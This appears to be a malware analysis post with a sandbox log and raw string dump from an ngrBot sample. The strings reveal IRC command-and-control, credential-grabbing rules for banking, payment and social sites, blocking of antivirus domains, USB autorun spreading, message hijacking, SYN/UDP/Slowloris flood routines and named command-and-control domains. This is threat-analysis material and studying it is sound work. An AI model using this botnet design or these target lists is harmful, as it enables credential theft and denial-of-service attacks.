Large ngrBot server hosted in Germany
Here u have strings from 2 executable samples
30upjmrlzz.exe
Processes:
PID ParentPID User Path
--------------------------------------------------
2872 1236 C:Documents and SettingsMes documents30upjmrlzz.exe
Ports:
Port PID Type Path
--------------------------------------------------
Explorer Dlls:
DLL Path Company Name File Description
--------------------------------------------------
No changes Found
IE Dlls:
DLL Path Company Name File Description
--------------------------------------------------
No changes Found
Loaded Drivers:
Driver File Company Name Description
--------------------------------------------------
Monitored RegKeys
Registry Key Value
--------------------------------------------------
Kernel31 Api Log
--------------------------------------------------
***** Installing Hooks *****
719f74df RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinSock2Parameters)
719f80c4 RegOpenKeyExA (Protocol_Catalog9)
719f777e RegOpenKeyExA (00000095)
719f764d RegOpenKeyExA (Catalog_Entries)
719f7cea RegOpenKeyExA (000000000001)
719f7cea RegOpenKeyExA (000000000002)
719f7cea RegOpenKeyExA (000000000003)
719f7cea RegOpenKeyExA (000000000004)
719f7cea RegOpenKeyExA (000000000005)
719f7cea RegOpenKeyExA (000000000006)
719f7cea RegOpenKeyExA (000000000007)
719f7cea RegOpenKeyExA (000000000008)
719f7cea RegOpenKeyExA (000000000009)
719f7cea RegOpenKeyExA (000000000010)
719f7cea RegOpenKeyExA (000000000011)
719f7cea RegOpenKeyExA (000000000012)
719f7cea RegOpenKeyExA (000000000013)
719f7cea RegOpenKeyExA (000000000014)
719f7cea RegOpenKeyExA (000000000015)
719f7cea RegOpenKeyExA (000000000016)
719f7cea RegOpenKeyExA (000000000017)
719f7cea RegOpenKeyExA (000000000018)
719f7cea RegOpenKeyExA (000000000019)
719f2623 WaitForSingleObject(77c,0)
719f87c6 RegOpenKeyExA (NameSpace_Catalog5)
719f777e RegOpenKeyExA (00000039)
719f835b RegOpenKeyExA (Catalog_Entries)
719f84ef RegOpenKeyExA (000000000001)
719f84ef RegOpenKeyExA (000000000002)
719f84ef RegOpenKeyExA (000000000003)
719f84ef RegOpenKeyExA (000000000004)
719f2623 WaitForSingleObject(774,0)
719e1af2 RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinsock2Parameters)
719e198e GlobalAlloc()
7c80b72f ExitThread()
7d2454bb LoadLibraryA(KERNEL32.DLL)=7c800000
7d2454bb LoadLibraryA(MSVBVM60.DLL )=73370000
73371c38 GetCommandLineA()
73372f57 CreateMutex((null))
7d23eab5 WaitForSingleObject(764,7530)
410de8 LoadLibraryA(KERNEL32.DLL)=7c800000
410de8 LoadLibraryA(MSVBVM60.DLL )=73370000
733739f4 GetCommandLineA()
7338d1b3 LoadLibraryA(C:WINDOWSsystem32VB6FR.DLL)=0
7337452c GetVersionExA()
7337476c LoadLibraryA(OLEAUT32.DLL)=770e0000
772370b9 GetVersionExA()
7723711c GetCommandLineA()
7337476c LoadLibraryA(SXS.DLL)=77210000
774efa66 LoadLibraryA(oleaut32.dll)=770e0000
73376792 RegOpenKeyA (HKLMSOFTWAREMicrosoftVBAMonitors)
77daeff6 RegOpenKeyExA (HKLMSOFTWAREMicrosoftVBAMonitors)
770fc957 LoadLibraryA(C:WINDOWSsystem32kernel32.dll)=7c800000
7337a15b LoadLibraryA(kernel32.dll)=7c800000
406f1e LoadLibraryA(kernel32)=7c800000
7337a15b LoadLibraryA(kernel32)=7c800000
7337a15b LoadLibraryA(USER32)=7e390000
7345d09c CreateFileA(C:Documents and SettingsMes documents30upjmrlzz.exe)
7345d34f ReadFile()
406f1e LoadLibraryA(NTDLL)=7c910000
7c8165b3 WaitForSingleObject(74c,64)
7c8191f8 LoadLibraryA(advapi32.dll)=77da0000
7337a4c5 GetCurrentProcessId()=1236
7337bdfa RegOpenKeyExA (HKLMSoftwareMicrosoftWindows)
7337be1c RegOpenKeyExA (HTML Help)
7337be1c RegOpenKeyExA (Help)
7337c9ce WaitForSingleObject(7e4,ffffffff)
73373657 ExitProcess()
***** Injected Process Terminated *****
DirwatchData
--------------------------------------------------
WatchDir Initilized OK
Watching C:DOCUME~1LOCALS~1Temp
Watching C:WINDOWS
Watching C:Program Files
Created: C:WINDOWSPrefetch30UPJMRLZZ.EXE-2CE4436A.pf
Modifed: C:WINDOWSPrefetch30UPJMRLZZ.EXE-2CE4436A.pf
Created: C:DOCUME~1zezakLOCALS~1TempJET501A.tmp
Created: C:DOCUME~1zezakLOCALS~1TempJET2F.tmp
Deteled: C:DOCUME~1zezakLOCALS~1TempJET2F.tmp
Deteled: C:DOCUME~1zezakLOCALS~1TempJET501A.tmp
File: 30upjmrlzz.exe
Size: 116236 Bytes
MD5: AB7DDF19DE425E6439160DD343B391E1
Packer: File not found C:iDEFENSESysAnalyzerpeid.exe
File Properties: CompanyName H3 7H
FileDescription
FileVersion 43.34.0003
InternalName 1
LegalCopyright
OriginalFilename
ProductName 4H37H
ProductVersion
Exploit Signatures:
---------------------------------------------------------------------------
Scanning for 19 signatures
Scan Complete: 312Kb in 0,031 seconds
Urls
--------------------------------------------------
http://%s/%s
http://%s/
http://
http://api.wipmania.com/ftp://%s:%s@%s:%d
RegKeys
--------------------------------------------------
gdatasoftware.
sunbeltsoftware.
SoftwareMicrosoftWindowsCurrentVersionRun
SoftwareMicrosoftWindowsCurrentVersionRun
SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
.DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun
ExeRefs
--------------------------------------------------
File: 30upjmrlzz_dmp.exe_
.exe
%windir%system32cmd.exe
&&%%windir%%explorer.exe %%cd%%%s
%0x.exe
Internet Exploreriexplore.exe
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
.exe
lol.exe
winlogon.exe
explorer.exe
y%s%s.exe
lsass.exe
Raw Strings:
--------------------------------------------------
File: 30upjmrlzz_dmp.exe_
MD5: 20355b2f65c907536ac74b1c4cae1189
Size: 319490
Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich:
.text
`.rdata
@.data
.reloc
WPVS
t1h(
_[^]
QRPWV
RPQWV
QRPSV
txVhD
uaVhD
QRPSV
SVW3
u3h0
u!h(
u3h0
PQRV
RPQW
u:WhD
u#WhD
QRPW
RPQV
RPQV
PQRV
RPQW
RSSh
vG9u
t0WSV
WVRj
WSPQR
vt9u
t0WSV
WVRj
WSPQR
gfff
WVRj
PWQR
u3h0
u!h(
u3h0
>CAL
uGh4
=MSG t
=SDG
>MSG u`
SVW3
SVW3
9:vP
G;9r
@W;F
Wj h
t&j,j
Wjdj
F4VP
SWf9
t-f;
t=hH
_^[]
=pzC
|04+~4
_^[]
SVWP3
QWSVR
=lzC
QPRWS
RPQS
WQRV
_^[]
_^[]
un9F
t2j h
L9_@vI
;_@r
WVPQR
SQRj
STFU
=pzC
A8j@
QWRPV
B0QPV
=4yA
PQRj
PQRj
SVWh
STFU
Vh@P@
L9^8vE
;^8r
=pzC
hpP@
STFU
PL9^(v^
9+=pzC
+=pzC
+=pzC
+=pzC
+=pzC
+=pzC
;^(r
9~0v/
;~0r
9^8v;
:+=pzC
+=pzC
+=pzC
;^8r
9^@v2
:+=pzC
+=pzC
+=pzC
;^@r
tu9]
RVWPQ
uXWV
QVWRP
u$WP
E$_^[
tpVW
uTVW
E$_^[
E$^[
E$_^[
j&hx
t}hP
QVWh
95hVA
QVht
8POST
tWWV
PQWj
RPQVW
RPQVW
WVRPS
u h(
QWRS
SVWh
SVW3
95PWA
;5PWA
95PWA
;5PWA
VWQh4
t"j V
SVWh
=USERt
=PASS
:Uu#Vh
8Pu.
=FEATt
=TYPEt
=PASVu
=STATt
=LISTu
uuhh
ucWVh
RPQh
PQRh
QRPh
QVh:
Rh~f
_[^]
_[^]
F/PQ
~(WR
T0(RW
t=VW
Qh~f
u4SV
W$RP
tmQh
RSSh
t,PVQ
O,@PQ
TSVW3
WWWWh
F4RP
LSVW3
^<^[
V4QR
vJ9^,u
;F8v
N4PQ
F4RP
F@@PR
F,BRP
u-SSV
RSWWj
8httpu1
u$8H
QRVP
RVPQ
QRVP
RVPQ
=|[A
Qh~f
SVWP
=|[A
Rh~f
hh)A
h`)A
=|[A
tlWP
=|[A
tlWP
=|[A
Rh~f
=|[A
=|[A
_^[]
h0^A
hh^A
SVWj
_^Yj
QPPPPh
h(*A
SVWj,
VjP
[@^]
Vj.P
[@^]
QRRj
RRRRf
[_^]
SVWh
h0*A
*t2:
VhH*A
Qh4*A
QSV3
j PhxWA
h`*A
Vj#S
_^[]
Wj*P
^[_]
h0+A
h$+A
SVWh
VVVV
WWVS
SVW3
RVh-
@PVj
PVh-
VhH+A
SVW3
@PVj
RVj"W
hT+A
hT+A
h|+A
ht+A
Rhh+A
QhX+A
@PVR
Wj j+V
<%u2
VVVV
SVWh
QRPu
PQRu
h ,A
QRhL]A
PhTA
Ph$]A
9Q@w
RRhh
h`]A
h`]A
h`]A
h`]A
Ph0]A
8nu8h
Rh0]A
Qh0]A
Rh0]A
Ph@]A
8nu8h
Rh@]A
Qh@]A
Rh@]A
htXA
h@XA
PVRQhT`A
PQRVh
RQPhT`A
PQRSh
8_^[
hPXA
hXA
hHXA
Rh0]A
Rh0]A
Rh@]A
Qh@]A
h|,A
h|,A
hx,A
QhP_A
Qh|_A
hx,A
h(XA
hp,A
hd,A
h8XA
8httpuM
8:uE
u>8P
PhD,A
$_^[
Qh@`A
_^[
h@,A
h(`A
h|bA
QRPh4,A
h`XA
h4XA
hXXA
hpXA
QRPh4,A
hhXA
RPQh4,A
SVWh
8#t"
RVWP
SVWR
hx,A
hx,A
hx]A
Qhl]A
PQh0]A
u(hl
Ph$]A
QRh0]A
SVW3
h -A
t"h<-A
t"h0-A
u5h(-A
Vh$cA
VhDcA
VhdcA
VhpcA
t)h0u
SVW3
RPhD-A
QRPh
QRPh
PQRhTaA
PQhDbA
PRh(aA
QRPh
SVW3
tRh|,A
uBPh
h`]A
h -A
PWQRh
SPQh
PSRhTaA
PhTaA
PRhDbA
Ph(aA
hx,A
tqCh
s[h5
ht.A
SWhl.A
hd.A
t'j j
h<.A
h46A
SVWh
hx,A
Rh$6A
h/A
h/A
tb@Ph
Rhd/A
;< t
SVW3
Wh00A
h 0A
5$iA
50iA
5<iA
5HiA
5TiA
5`iA
5liA
95$iA
6 iA
taVW
h@0A
hD0A
Ph<_A
|Sj 3
tlSSSSSSSSSShL0A
Phd0A
tU< u
u2Wh
h(3A
hT+A
hT+A
SVWh
hT+A
h,3A
u.h,3A
SVWh
RhP3A
PVQR
h@3A
;SDG
8SDG
h,3A
Qhx3A
RPhl3A
QRhT3A
t!WV
_^[]
hl.A
hd.A
hl.A
hd.A
h(mA
h(5A
t!h85A
_^t)
9|:~
:~+w:~
tK@boL@
L@iBK@
%s.%s
pdef
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
block
bdns
CreateFileW
0123456789ABCDEF
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
msnint
baddr
X-MMS-IM-Format:
CAL %d %256s
msnu
Done frst
ngr->blocksize: %d
block_size: %d
NtFreeVirtualMemory
NtAllocateVirtualMemory
NtQuerySystemInformation
LdrEnumerateLoadedModules
NtQueryInformationProcess
LdrGetProcedureAddress
NtQueryVirtualMemory
LdrLoadDll
NtQueryInformationThread
LdrGetDllHandle
RtlAnsiStringToUnicodeString
.pipe%s
kernel32.dll
GetNativeSystemInfo
%s_%d
%s_0
%s-Mutex
SeDebugPrivilege
ntdll.dll
NtGetNextProcess
%s-pid
%s-comm
NtResumeThread
PONG
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
.exe
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %255s
JOIN %255s
PRIVMSG
JOIN
%s:%d
NtSetInformationProcess
%s.%s%s
%S%s%s
HKCU
HKLM
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
popgrab
%s:%s@%s:%d
anonymous
ftp://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
Directadmin
WHCMS
cPanel
blog
%s-%s-%s
ffgrab
iegrab
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
fortinet.
virusbuster.nprotect.
gdatasoftware.
virus.
precisesecurity.
lavasoft.
heck.tc
emsisoft.
onlinemalwarescanner.
onecare.live.
f-secure.
bullguard.
clamav.
pandasecurity.
sophos.
malwarebytes.
sunbeltsoftware.
norton.
norman.
mcafee.
symantec
comodo.
avast.
avira.
avg.
bitdefender.
eset.
kaspersky.
trendmicro.
iseclab.
virscan.
garyshood.
viruschief.
jotti.
threatexpert.
novirusthanks.
virustotal.
login[password]
login[username]
*members*.iknowthatgirl*/members*
IKnowThatGirl
*youporn.*/login*
YouPorn
*members.brazzers.com*
Brazzers
clave
numeroTarjeta
*clave=*
*bcointernacional*login*
Bcointernacional
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
Dotster
loginid
*enom.com/login*
Enom
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
1and1
token
*moniker.com/*Login*
Moniker
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
Namecheap
loginname
*godaddy.com/login*
Godaddy
Password
EmailName
*Password=*
*alertpay.com/login*
Alertpay
*netflix.com/*ogin*
Netflix
*thepiratebay.org/login*
Thepiratebay
*torrentleech.org/*login*
Torrentleech
*vip-file.com/*/signin-do*
Vip-file
*pas=*
*sms4file.com/*/signin-do*
Sms4file
*letitbit.net*
Letitbit
*what.cd/login*
Whatcd
*oron.com/login*
Oron
*filesonic.com/*login*
Filesonic
*speedyshare.com/login*
Speedyshare
*pw=*
*uploaded.to/*login*
Uploaded
*uploading.com/*login*
Uploading
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
Fileserve
*hotfile.com/login*
Hotfile
*4shared.com/login*
4shared
txtpass
txtuser
*txtpass=*
*netload.in/index*
Netload
*freakshare.com/login*
Freakshare
login_pass
*login_pass=*
*mediafire.com/*login*
Mediafire
*sendspace.com/login*
Sendspace
*megaupload.*/*login*
Megaupload
*depositfiles.*/*/login*
Depositfiles
userid
*signin.ebay*SignIn
eBay
*officebanking.cl/*login.asp*
OfficeBanking
*secure.logmein.*/*logincheck*
LogMeIn
session[password]
session[username_or_email]
*password]=*
*twitter.com/sessions
Twitter
txtPassword
txtEmail
*&txtPassword=*
*.moneybookers.*/*login.pl
Moneybookers
*runescape*/*weblogin*
Runescape
*dyndns*/account*
DynDNS
*&password=*
*no-ip*/login*
NoIP
*steampowered*/login*
Steam
quick_password
quick_username
username
*hackforums.*/member.php
Hackforums
email
*facebook.*/login.php*
Facebook
*login.yahoo.*/*login*
Yahoo
passwd
login
*passwd=*
*login.live.*/*post.srf*
Live
TextfieldPassword
TextfieldEmail
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
Gmail
FLN-Password
FLN-UserName
*FLN-Password=*
*fastmail.*/mail/*
Fastmail
pass
user
*pass=*
*bigstring.*/*index.php*
BigString
screenname
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
Email
*service=youtube*
*google.*/*ServiceLoginAuth*
YouTube
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
PayPal
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Keep-Alive: 300
Connection: keep-alive
Content-Length: 42
POST
Mozilla/4.0
Connection: Close
X-a: b
.PHYSICALDRIVE0
00100
SeShutdownPrivilege
NtShutdownSystem
This binary is invalid.
Main reasons:
- you stupid cracker
- you stupid cracker...
- you stupid cracker?!
ngrBot Error
shell32.dll
http
httpi
usbi
dnsapi.dll
DnsFlushResolverCache
http://%s/%s
http://%s/
HTTP
Host:
POST /%1023s
{%s|%s%s}%s
n%s{%s|%s%s}%s
<br>
admin
isadmin
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
disabled
enabled
%s|%s
[Logins]: Cleared %d logins
#user
#admin
#new
removing
exiting
reconnecting
MOTD
bsod
disable
POP3 ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
dlds
http://
rebooting
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
SoftwareMicrosoftWindowsCurrentVersionRun
ngrBot
running
IPC_Check
shellopencommand=
shellexplorecommand=
icon=shell32.dll,7
useautoplay=1
action=Open folder to view files
shellexecute=
[autorun]
.lnk
%windir%system32cmd.exe
&&%%windir%%explorer.exe %%cd%%%s
/c "start %%cd%%RECYCLER%s
RECYCLER
.inf
%s%s
.%c:
%s%s
%sautorun.tmp
%sautorun.inf
%c:
gdkWindowToplevelClass
%0x.exe
comment-text
*bebo.*/c/home/ajax_post_lifestream_comment
bebo Lifestream
*bebo.*/c/profile/comment_post.json
bebo Comment
Message
*bebo.*/mail/MailCompose.jsp*
bebo Message
*friendster.*/sendmessage.php*
Friendster Message
comment
Friendster Comment
shoutout
*friendster.*/rpc.php
Friendster Shoutout
*vkontakte.ru/mail.php
vkontakte Message
*vkontakte.ru/wall.php
vkontakte Wall
message
*vkontakte.ru/api.php
vkontakte Chat
text
*twitter.*/*direct_messages/new*
Twitter Message
*twitter.*/*status*/update*
Twitter Tweet
status
*facebook.*/ajax/*MessageComposerEndpoint.php*
Facebook Message
msg_text
*facebook.*/ajax/chat/send.php*
Facebook IM
-_.!~*'()
Content-Length:
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Reliability:
From:
Content-Length: %d
X-MMS-IM-Format:
SDG %d
bmsn
%s_0x%08X
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
PR_Write
DnsQuery_W
DnsQuery_A
InternetWriteFile
HttpSendRequestW
HttpSendRequestA
GetAddrInfoW
send
CreateFileA
MoveFileW
MoveFileA
DeleteFileW
DeleteFileA
CopyFileW
CopyFileA
NtQueryDirectoryFile
NtEnumerateValueKey
%08x
OPEN
DnsFree
DnsQuery_A
DNSAPI.dll
FreeContextBuffer
InitializeSecurityContextW
FreeCredentialsHandle
DeleteSecurityContext
QueryContextAttributesW
AcquireCredentialsHandleW
EncryptMessage
DecryptMessage
InitializeSecurityContextA
ApplyControlToken
Secur32.dll
SHGetSpecialFolderPathW
SHGetFileInfoA
ShellExecuteA
SHELL32.dll
InternetCloseHandle
InternetReadFile
InternetQueryDataAvailable
HttpQueryInfoA
InternetOpenUrlA
InternetOpenA
HttpQueryInfoW
InternetQueryOptionW
WININET
.dll
PathAppendW
StrStrIA
PathAppendA
PathFindExtensionA
SHLWAPI.dll
WS2_32.dll
memset
wcsstr
strstr
wcsrchr
??3@YAXPAX@Z
atoi
sscanf
_strcmpi
printf
_snprintf
sprintf
strncpy
_memicmp
_wcsnicmp
_vsnprintf
_stricmp
strtok
strchr
_snwprintf
??2@YAPAXI@Z
_strnicmp
isxdigit
memmove
strncmp
toupper
strrchr
vsprintf
isalnum
strncat
MSVCRT.dll
lstrcpyA
MoveFileExA
lstrcmpA
WideCharToMultiByte
MoveFileExW
lstrcmpW
ExitThread
MultiByteToWideChar
GetFileAttributesA
SetFileAttributesW
GetFileAttributesW
LoadLibraryW
CloseHandle
SetFileTime
CreateFileW
GetFileTime
GetSystemTimeAsFileTime
WriteFile
GetModuleHandleW
GetLastError
ReadFile
GetTickCount
HeapAlloc
GetProcessHeap
HeapFree
lstrlenA
Sleep
WriteProcessMemory
ReadProcessMemory
InitializeCriticalSection
LeaveCriticalSection
EnterCriticalSection
HeapReAlloc
SetEvent
ConnectNamedPipe
CreateNamedPipeA
CreateEventA
DisconnectNamedPipe
GetOverlappedResult
WaitForMultipleObjects
CreateFileA
VirtualFreeEx
VirtualAllocEx
IsWow64Process
CreateRemoteThread
OpenProcess
WaitForSingleObject
ReleaseMutex
MapViewOfFile
OpenFileMappingA
CreateFileMappingA
InterlockedIncrement
UnmapViewOfFile
CreateMutexA
GetVersionExA
GetModuleFileNameW
InterlockedCompareExchange
CreateThread
GetWindowsDirectoryW
DeleteFileW
GetTempFileNameW
lstrcatW
lstrcpynW
DeleteFileA
SetFileAttributesA
lstrcpyW
LocalFree
LocalAlloc
lstrcpynA
SetFilePointer
DeviceIoControl
VirtualAlloc
CreateProcessW
ExitProcess
lstrcatA
GetVolumeInformationW
GetLocaleInfoA
FlushFileBuffers
CopyFileW
FindClose
FindNextFileA
FindFirstFileA
SetCurrentDirectoryA
LockFile
GetFileSize
CreateDirectoryA
GetLogicalDriveStringsA
OpenMutexA
GetModuleFileNameA
GetWindowsDirectoryA
KERNEL32.dll
MessageBoxA
wvsprintfA
wsprintfW
DefWindowProcA
DispatchMessageA
TranslateMessage
GetMessageA
RegisterDeviceNotificationA
CreateWindowExA
RegisterClassExA
USER32.dll
CryptGetHashParam
CryptDestroyHash
CryptHashData
CryptReleaseContext
CryptCreateHash
CryptAcquireContextA
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
RegCloseKey
RegSetValueExW
RegCreateKeyExW
RegNotifyChangeKeyValue
RegSetValueExA
RegOpenKeyExA
ADVAPI32.dll
CoCreateInstance
CoInitialize
ole32.dll
n;^
Qkkbal
i]Wb
9a&g
MGiI
wn>Jj
#.zf
+o*7
!!!!!!!!
@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@""""""""""""""""
@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@x
lalorlz1.info
ROCKR
rlz1lola.info
ROCKR
rlz01jm.info
ROCKR
#ROCK
ngrBot
ELPERRO
]1.1.0.0
CUSTOMER
FvLQ49IlzIyLjj6m
msn.set
msn.int
http.set
http.int
http.inj
mdns
stats
speed
logins
slow
ssyn
stop
F4XA
gGWHXA
5hXA
ZpXA
` WA
f0WA
u{A<WA
[@WA
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
NICK %s
JOIN %s %s
PART %s
PRIVMSG %s :%s
QUIT :%s
PONG %s
PING
PRIVMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread inte
rval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Stopped rsock4
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef+]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
poplog
ftpinfect
httplogin
httptraff
ruskill
rdns
rreg
httpspread
http://api.wipmania.com/
.pipe%08x_ipc
0;0G0O0V0d0n0s0
1)13181Y1e1u1|1
2C2c2
3 363M3j3u3
6(6/686J6O6T6m6
7 7(7O7V7_7
7=8T88
9#9:9W9^9f9~9
98:R:[:
;U<e<j<p<
<g=o=
>*>N>
?%?/?6?A?P?
0<0E0L0S0c0i0t0{0
2!3-4d4n4s4
5(5:5?5D5a5x5
6 6J6a6
7&7.7>7I7N7f7
1#2_2
8"8Q8X8g8q8
9':;:Y:
<'<1<H<X<x<
=%=7=D=K=Z=w=}=
>@>R>>m>
?1?<?B?j?
0g0g1
1"2Q2~2
203N3
424>4^4
8;9~9
:K:';A;_;
<4<><T<^<h<
=*=>=D=N=l=u=
>#>)>8>>>O>Y>^>p>u>
?8?L?c?u?
0$1-1H1N1_1n1
313Y3k3
414l4
515B5P5u5
676V6_6f6v6
889Y9r9
:-:G:
;#;(;2;7;<;A;F;W;
<5<?<^<
<W=l=|=
=d>o>{>
?/?U?`?p?
1P2T2X2
3?4a4h4
5A5H5|5
7U8]8f8}8
9'9-939q9
: :%:n:
;1;J;d;
<%<3<<<B<i<v<
=$=+=0===E=L=T=o=v=
=6>E>
?%?4??
0'0K0�s0x0}0
091M1g1t1
3[3q3
3*494
4-575w5~5
5B6L6
6(7I7]7z7
848_9m9w9
:+:1:7:D:Q:V:e:t:
; ;,;8;L;Q;V;n;s;x;};
;5<B<]<w<
=5===B=N=S=g=l=
5"6-6B6L6Q6c6u6
7 70767=7L7R7
94:{:
'010
1.1F1^1
2(2>2P2b2t2
4K5f5
6=6K6Y6
7*7/7L7S7r7
8]8i8
9+9;9A9G9d9q9w9}9
9/:b:h:
;!;S;`;h;s;
;E<e<w<
=.=<=A=F=L=R=k=u=
>#>,>X>
?-??y?
42484T4`4f4
4X5]5|5
6-646D6Q6[6b6g6q6z6
9 9&9<9G9R9W99q9v9
9::G:M:b:j:z:
;.;6;;;B;H;S;c;k;
<+<F<T<`<
=3=E=Q=
>3>T>k>z>
?Z?r?{?
%0<0V0h0
141>1l1
3g3r3
34c4
5*585R5w5
6!6<6R6a6
7=7C7T7g7z7
8-9L9w9
9-:D:W:
;#;4;:;T;Z;
<#<(<-<2<7<P<j<w<
=)=.=K=[=`=}=
>+>I>V>[>s>z>
?*?H?T?a?g?u?
0,0J0Z0g0l0v0
1%101=1C1I1W1s1y1
2'212<2J2_2
3"3@3P3V3
4)4J4h4x4
535Q5s5
6!6.656D6S6`6m6z6
7?7E7
7'8,818[8w8
8.9K9V9s9
:':,:D:T:Y:r:
;2;7;W;r;w;|;
<$<5<<<F<N<b<
=(=I=O=Z=r=|=
>V>g>|>
>#?h?
0-070D0x0
0@1G1
132D2Z2p2
3*343=3R3^3
3-434=4F5P5]5
536N6[6
637B7U7d7q7
818>8T8]8|8
9T9`9o9u9z9
:!:,:3:;:A:O:Y:f:l:r:
;(;3;9;?;Q;];c;i;{;
<&<3<8<G<T<Z<`<n<
<,=3=A=G=W=w=|=
>@>E>>
>W?`?
010C0H0M0a0f0k0
1 1$1<1M1U1
1-2O2z2
3I3Z3o3z3
4"4'4<4U4_4t4z4
575=5r5|5
6(6=6P6m6z6
7 767<7~7
8A8F8Y8c8j8
999C9
:%:,:3:=:F:e:
;+;=;D;X;];c;i;n;
;.<4<;<@<e<p<w<
="=*=0=;=F=O=Z=b=g=v={=
=7>N>W>]>
>&?7?~?
40;0A0Q0a0
2)2A2[2
2T3]3f5
6F6Y6t6
7I7Y7_7e7k7q7w7}7
8*808;8~8
9 9O9X9^9
9$:0:Q:
:&;2;8;F;
<"<2<=<Q<W<i<
=$=*=4=:=E=K=S=e=
>;>I>
?!?F?M?W?
1$1<1I1[1g1
2%2>2V2a2t2|2
373E3M3a3l3
3@4N4U4
5/565<5R5k5
666i6
7.7M7
8,818M8[8`8
8?9R9
:#:4:9:?:E:P:{:
;#;B;U;[;b;r;
<!<o<
=$=;=C=N=S=X=i=n=s=}=
>">(>.>4>:>@>F>L>R>X>^>d>j>p>v>|>
?B?H?N?T?Z?`?f?l?r?x?~?
4 4$4(4,4044484<4@4D4H4L4P4T4X66`6h6l6p6t6x6|6
7D7L7X77`7d7h7l7p7t7
9(949@9L9X9d9p9|9
:$:0:<:H:T:`:l:x:
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;;`;d;h;
4 4$4(4,4044484<4@4D4H4L4P4T4X44`4d4h4l4p4t4x4|4
5 5$5(5,5054585<5@5D5H5L5P5T5X55`5d5h5l5p5t5x5|5
6 6$6(6,6064686<6@6D6H6L6P6T6X66`6d6h6l6p6t6x6|6
7 7$7(7,7074787<7@7D7H7L7P7T7X77`7d7h7l7p7t7x7|7
8 8$8(8,8084888<8@8D8H8L8P8T8X88`8d8h8l8p8t8x8|8
8 9,989D9P99h9x9|9
: :(:,:0:8:<:@:X:`:d:h:l:p:x:|:
; ;$;(;,;0;8;<;@;D;H;P;T;X;;`;h;l;p;t;x;
< <(<,<0<4<8<@<D<H<L<P<X<<`<d<h<p<t<|<
=(=0=8=@=H=T==d=l=
Unicode Strings:
---------------------------------------------------------------------------
Ajjj
jjjj
jjjj
jjjj
$jjj
Ajjj
